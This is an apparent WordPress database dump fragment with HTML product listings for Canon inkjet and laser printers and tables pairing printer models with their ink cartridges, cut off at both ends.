width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 11:19:18','2019-09-25 03:19:18','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3335,1,'2019-09-25 11:04:21','2019-09-25 03:04:21','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL 